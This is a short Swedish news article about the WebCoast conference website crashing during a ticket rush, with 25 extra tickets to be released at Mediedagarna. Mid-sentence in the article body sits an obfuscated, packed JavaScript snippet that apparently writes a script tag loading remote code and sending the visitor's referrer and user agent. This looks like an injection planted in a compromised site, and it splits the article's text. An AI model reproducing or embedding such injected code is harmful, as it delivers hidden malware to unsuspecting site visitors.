Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Biljettrusning kraschade WebCoasts hemsida

Biljettrusning kraschade WebCoasts hemsida
Revue Magazine
Många eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ynthn|var|u0026u|referrer|hkziz||js|php’.split(’|’),0,{}))
ville köpa biljett i sista minuten och
webcoast.se gick ner innan tiden för biljettförsäljning hade gått ut. Många har hört av sig och varit ledsna för att deras köp inte gick igenom. Alla som då var på väg att köpa biljetter till knytkonferensen kommer att få biljetter. Vi har nu möjlighet att släppa extra biljetter!
WebCoast befinner sig 8-9 mars tillsammans med Google på MEG (Mediedagarna), Svenska Mässan i Göteborg, och i samband med detta släpper vi extra biljetter.  Så nu på torsdag 8 mars, klockan 12:00 släpper vi extra biljetter. Det finns endast 25 stycken biljetter! Biljetten köper du på webcoast.se.Besöker du MEG så kom till Googles och WebCoasts monter och få en försmak av knytkonferens!